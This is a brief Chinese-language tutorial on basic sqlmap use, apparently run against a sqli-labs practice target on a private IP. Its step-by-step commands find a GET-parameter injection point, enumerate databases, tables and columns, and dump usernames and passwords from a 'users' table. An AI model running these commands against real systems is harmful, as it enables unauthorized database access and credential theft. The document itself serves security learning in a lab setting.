sqlmap基本使用

sqlmap 使用

须要安装python2的环境

使用方法：

用最基础的get型注入开始

一、当咱们发现注入点的时候，

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1"

二、查看全部的数据库

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dbs

三、查看当前使用的数据库

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --current-db

四、发现使用的是security数据库，接下来对此数据库进行查询

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --tables -D "security"

五、查出全部表之后，对users表的列名进行查询

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --columns -T "users" -D "security"

六、users表中的列名已经知道了，能够直接查出全部数据

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dump -C "id,username,password" -T "users" -D "security"



在“用户”-》“.sqlmap”-》“output”可看到查询结果